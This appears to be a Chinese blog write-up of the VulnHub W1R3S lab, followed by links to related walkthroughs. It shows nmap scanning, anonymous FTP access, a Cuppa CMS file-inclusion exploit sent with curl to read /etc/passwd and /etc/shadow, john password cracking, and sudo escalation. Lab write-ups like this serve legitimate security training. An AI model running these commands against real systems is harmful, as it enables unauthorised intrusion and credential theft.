渗透项目(五):W1R3S

最新推荐文章于 2024-03-13 11:31:39 发布
最新推荐文章于 2024-03-13 11:31:39 发布
阅读量1.4k 收藏 2
点赞数 5
分类专栏: 渗透项目 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938645/article/details/127586371
版权

项目地址:W1R3S: 1.0.1 ~ VulnHub

1、W1R3S的考察点:

1)信息收集:

1、nmap挖掘信息。2、页面枚举。3、Cuppa CMS LFI

2)提权:

1、sudo提权

2、渗透过程:

1)、将下载好的靶机解压到VMware中打开。

2)、打开kali,查看本机ip地址,同时查看同网段的地址输入:

ifconfig     #查看到ip地址为192.168.188.128

nmap -sP 192.168.188.1/24     #查看同网段存活的主机

发现靶机192.168.188.131

3)对靶机进行信息收集,输入:

nmap -p- 192.168.188.131   #收集靶机开放的端口

nmap 192.168.188.131 -sS -sV -A  -T5   #收集靶机具体的端口以及底层的信息 

发现有21、22、80、3306端口,所以可以想到21端口是否存在未授权登录,像渗透项目四一样,可以匿名登录。22端口可能存在ssh爆破。80端口的web服务可能出现一些web漏洞可以利用等等。

 用nmap挖掘到了更多的信息,这里ftp可以进行未授权访问,输入:

ftp 192.168.188.131   #进行anonymous访问,用户名是anonymous,密码随便或者直接回车。

dir    #发现有三个文件夹

利用get 依次将其下载到kali本地

下载到本地后依次打开,发现并没有什么有用的东西。

4)对22端口爆破,没有详细的信息没办法生成特别管用的密码文件,也没有爆破出来。然后去查看80端口的web服务,浏览器输入靶机ip地址,发现是个apache的主页。再没什么信息发现。

 5)下面就可以用dirb对网站进行枚举,输入:

dirb http://192.168.188.131/

发现了这样的路径,输入该路径发现这是一个Cuppa CMS框架

也可以输入    来查看是什么框架

whatweb http://192.168.188.131/administrator/installation/

6)搜索Cuppa CMS 的exploit,发现了id号为 25971 

这是一个文件包含漏洞。可以在kali本地输入:

searchsploit 25971   #查找漏洞

然后就之前的统一操作,locate然后cp到/home/kali,然后打开文件查看该exploit怎么使用

这里将里面的target改为靶机地址,然后在浏览器输入:

发现没有什么东西输出,url里是get请求,猜测应该是需要post请求。

在终端输入curl --help查看,curl是一个发送请求的命令

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.188.131/administrator/alerts/alertConfigField.php 

发现了一个用户,然后输入:

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.188.131/administrator/alerts/alertConfigField.php 

将这一长串,复制到一个txt文档中,利用john去破解

破解出来用户是w1r3s,密码是computer

7)利用ssh去远程登录下靶机,输入:

ssh w1r3s@192.168.188.131

8)利用sudo提权,知道了密码,直接sudo提权,然后进入根目录,就发现了flag文件。

 本次渗透就此完成!

后续会具体的学习文件包含漏洞!继续加油~继续努力~ 

Ays.Ie
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lotide:洛迪德W1项目
03-31
lotide:洛迪德W1项目
w1s:等待中的1s应用
05-09
这是waiting1s的演示
红队渗透靶场之W1R3S靶场(超详细!)
xf555er的博客
11-24 3048
- nmap的基本使用 - 目录爆破工具的使用 - CMS漏洞的利用 - Linux用户的简单提权
渗透靶场之W1R3S
m0_56190544的博客
06-26 367
完整的解析了vulnhub靶场中的W1R3S渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub)
最新发布
qq_63442530的博客
03-13 823
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
红队打靶:W1R3S: 1.0.1详细打靶思路(vulnhub)
Bossfrank的博客
05-30 2830
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
【学渗透靶机——W1R3S
jieli0901227的博客
04-02 369
02.txt 中第2个字符串可能是base64,使用工具进行解密,也没有效信息。(1)通过searchsploit cuppa cms 发现有可利用的漏洞。这里发现没有可以直接利用的漏洞,接下来对每个端口对应的服务进行测试。没有显示passwd , 查看25971 ,需要对参数值进行编码,浏览目录发现.txt 文件 ,通过mget 下载下来。02.txt 中第1个字符串可能是MD5。这里我们使用nmap确定靶机的ip地址。使用sudo 运行bash 进行提权。通过在线工具进行翻转。FTP渗透可能性不大。
【原创】项目w1r3s.v1.0.doc
07-12
【原创】项目w1r3s.v1.0.doc
w1:Linux内核W1 Netlink客户端
05-15
w1 Linux内核W1 Netlink客户端Linux内核w1 netlink文档: //www.kernel.org/doc/Documentation/w1/w1.netlink通过netlink的w1可用于与用户空间中的w1硬件(主设备和从设备)一起使用,延迟显着低于通过sysfs文件。 ...
w1_website-challenge-codewurld:w1_website-challenge-codewurld由GitHub Classroom创建
04-09
紧随其后的一小段README.md文件,描述了您进行该项目的方式(您的想法,研究,计划和决策依据) 额外的 这不仅是您练习HTML和CSS的核心技能的机会,而且是花时间思考如何为客户建立网站并采用以用户为中心的方法(这...
W1R3S渗透测试vulnhub(学习一下ftp)
weixin_56537388的博客
06-18 150
{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}get命令下载的文件将保存在本地计算机的工作目录下。get:下载指定文件get filename [newname](filename为下载的FTP服务器上的文件名,newname为保存在本都计算机上时使用的名字,如果不指定newname,文件将以原名保存。
w1r3s--靶机实操详解
qq_61802750的博客
08-05 300
把localhost指向我们的kali,再做一个实验,也许localhost不允许指定非本机ip,指向靶机ip可能不行,所以我们再创建一个域名来进行访问。看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。下面的字符,我们通过观察可以发现,它是上下颠倒加上前后倒序,kali里没有工具可以解密,我们可以百度进行查询。如果创建的域名可以访问的话,而localhost不行,那就是现在kali的环境不允许这样操作了。
【靶机渗透w1r3s.v1.0.1靶机渗透练习
serendipity1130的博客
08-30 551
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中) 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 3.使用gobuster扫到后台路径: gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.
W1R3S - VulnHub(漏洞靶机渗透测试)
Start C的博客
12-05 963
VulnHub靶机学习 - W1R3S
vulnhub靶机实战——W1R3S
weixin_30294295的博客
05-13 378
环境 靶机ip:192.168.163.132 攻击机ip:192.168.163.129 目的:拿下靶机并获得root权限 渗透 首先nmap扫描端口 nmap -sC -sV 192.168.163.132 可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。 首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有...
Linux sudo权限提升漏洞复现(CVE-2021-3156)
reaido的博客
02-02 549
一、背景 sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。 二、特性 § sudo能够限制用户只在某台主机上运行某些命令。 § sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。 § sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且
5-VulnHub-W1R3S
尼德霍格007
07-11 244
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 可以看到开放以下几个端口了 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先访问FTP,匿名访问不需要密码 content目录 一个一个打开看看,在01.txt中获得提示 02.txt ba
VulnHub-W1R3S: 1.0.1-靶机渗透学习
嗯嗯呐的博客
11-21 1571
**靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 靶机难度:中等(CTF) 靶机描述:你被雇来对W1R3S渗透测试。公司个人服务器并报告所有发现。他们要求您获得root权限并找到标志(位于/root目录中)。 目标:得到root权限目录信息收集LFI漏洞利用john密码破解提权总结 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先
w1=1:s(1,1):100
07-25
根据代码的意思,w1是一个按照步长为s(1,1)从1开始递增的一维数组,直到100为止。 具体解释如下:s(1,1)表示矩阵s的第一个元素,这个元素用作步长。而1:s(1,1):100表示以步长为s(1,1)从1开始递增,直到100为止,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值